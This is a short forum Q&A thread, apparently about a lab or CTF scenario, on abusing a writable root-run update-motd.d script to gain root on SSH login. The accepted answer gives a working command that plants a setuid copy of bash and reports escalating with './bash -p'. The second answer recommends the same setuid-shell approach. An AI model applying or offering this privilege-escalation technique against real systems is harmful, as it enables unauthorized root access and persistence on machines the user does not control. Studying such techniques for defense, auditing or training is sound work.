# inject update-motd.d 00-header to run a script on ssh login

Tags: ssh, privilege-escalation

Is there a way to inject the 00-header to trigger a script that executes a shell upon ssh login.

I'm facing a scenario where the 00-header has root privileges and I can modify it. I'm trying to have it spawn a root shell when I ssh into the machine as a regular user.

```
sysadmin@********:/etc/update-motd.d$ echo "/bin/bash -i" >> 00-header
```

That didn't work... it didn't trigger a shell when I ssh'd into the machine... it did edit the 00-header file

Answer (score 0, accepted):

```
echo "cp /bin/bash /home/name/bash && chmod u+s /home/name/bash" >> 00-header
```

Logging back out and in resulted in bash sitting in name home folder, with the suid bit set, and got to root via `./bash -p`.

Answer (score 2):

The exact implementation is going to vary depending on which GNU+Linux distribution you are using, but it is probably safe to assume that those scripts are running under a separate user/process and not in a way that would ever allow you to interact with a command; it looks like the output may be written to a file and then displayed to you.

Also, you will probably need to make that script executable if you haven't already.

Instead, do something that doesn't require interactive input, such as creating a setuid shell binary or granting your user increased privileges.